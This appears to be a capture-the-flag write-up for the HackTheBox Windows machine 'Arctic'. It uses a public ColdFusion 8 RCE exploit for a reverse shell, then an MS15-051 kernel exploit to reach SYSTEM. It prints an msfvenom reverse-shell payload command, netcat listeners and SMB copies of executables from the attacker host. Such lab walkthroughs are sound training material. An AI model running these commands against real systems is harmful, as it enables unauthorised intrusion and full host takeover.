Arctic
An easy Windows box from HackTheBox, get initial access via known RCE, then elevate privileges with a kernel exploit.
Recon
Running the usual nmap
sudo nmap -sC -sV -oA nmap/init 10.10.10.11
ORT STATE SERVICE VERSION
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
nmap doesn’t know what on port 8500, looking around, it could be ColdFusion Macromedia HTTP server
Looking at it in the browser, find that it is in fact this ancient server that takes 30 seconds to respond to requests
Navigating through the directories, also find out it is version 8.0
Exploitation
Then in searchsploit, there are a few RCE results, we can pick the python one
searchsploit coldfusion
...
Adobe ColdFusion 8 - Remote Command Execution (RCE)
cfm/webapps/50057.py
...
Then downloading it into the working directory
searchsploit -m cfm/webapps/50057.py
Then edit the file to change the lhost to the KALI_IP, and run the exploit to grab a reverse shell
python3 50057.py
...
Executing the payload...
listening on [any] 4444 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.11] 49353
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\ColdFusion8\runtime\bin>
Running systeminfo then run wesng to try for some privilege escalation
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 20/9/2022, 12:39:59 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2294 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 6.143 MB
Available Physical Memory: 4.983 MB
Virtual Memory: Max Size: 12.285 MB
Virtual Memory: Available: 11.143 MB
Virtual Memory: In Use: 1.142 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11
Can see that there are no hotfixes applied, so we can use whatever exploit we want to privesc, I opted for MS15-051
I uploaded the exe to the victim, and as well as a reverse shell executable (made with msfvenom)
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=9001 -f exe > rev.exe
Set up a reverse listener
rlwrap nc -lnvp 9001
And upload the executables using the smbserver script again
smbserver.py share .
Then on the victim, go to the TEMP directory and download them
c:\windows\TEMP> copy \\10.10.14.5\share\ms15-051x64.exe ms15-051x64.exe
c:\windows\TEMP> copy \\10.10.14.5\share\rev.exe rev.exe
And run the exploit
c:\windows\TEMP> ms15-051x64.exe rev.exe
Check back on the listener
listening on [any] 9001 ...
...
C:\WINDOWS\Temp>whoami
nt authority\system
And have root!